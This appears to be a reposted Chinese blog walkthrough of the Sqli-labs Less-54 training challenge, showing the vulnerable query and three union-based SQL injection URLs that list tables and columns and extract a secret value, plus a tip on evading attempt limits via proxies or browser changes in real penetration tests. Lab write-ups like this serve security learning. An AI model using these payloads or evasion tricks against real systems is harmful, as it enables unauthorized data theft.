zoukankan      html  css  js  c++  java
  • Sqli-labs Less-54 union注入 10次机会

    从本关开始,我们进入了page-4 Challenges。此系列主要是一个进阶的学习,将前面学到的知识进行更深次的运用。这一关我们主要考察的依旧是字符型注入,但是只能尝试十次。所以需要在尝试的时候进行思考。如何能更少的减少次数。这里的表名和密码等是每十次尝试后就强制进行更换。

    本关sql语句是

    $sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";

    因为已经知道了数据库名字叫做challenges,所以我们需要知道表名。

    http://127.0.0.1/sql/Less-54/?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--+

    已经得到表名为hcuhv04r8w(当然你测试的时候应该不是这个),接下来就是要找到该表的所有列

    http://127.0.0.1/sql/Less-54/?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='hcuhv04r8w'--+

    我们得到了所有的列,可以尝试将所有的数据进行查看,此处知道了密码在secret_PGN8列中,所以我们直接查看该列的内容

    http://127.0.0.1/sql/Less-54/?id=-1' union select 1,2,group_concat(secret_PGN8) from challenges.hcuhv04r8w--+

    将得到的密码进行提交。页面提示:congrats you nailed it,成功。

    其实实际渗透测试当中,我们可以利用更换ip(可以考虑代理)或者更换浏览器等,要看服务器端检测什么内容进行限制。

  • 相关阅读:
    Python爬虫之selenium各种注意报错
    以后的路还很长
    巧学DBhelper
    怎么学习程序语言
    C# winform 实现图片轮播
    P6477 [NOI Online #2 提高组]子序列问题(民间数据) 题解
    NOI Online Round 2 TG 游记
    「EZEC」 Round1 开学信心赛 游记
    P6023 走路 题解
    P6022 快乐水 题解
  • 原文地址:https://www.cnblogs.com/zhengna/p/12667686.html
Copyright © 2011-2022 走看看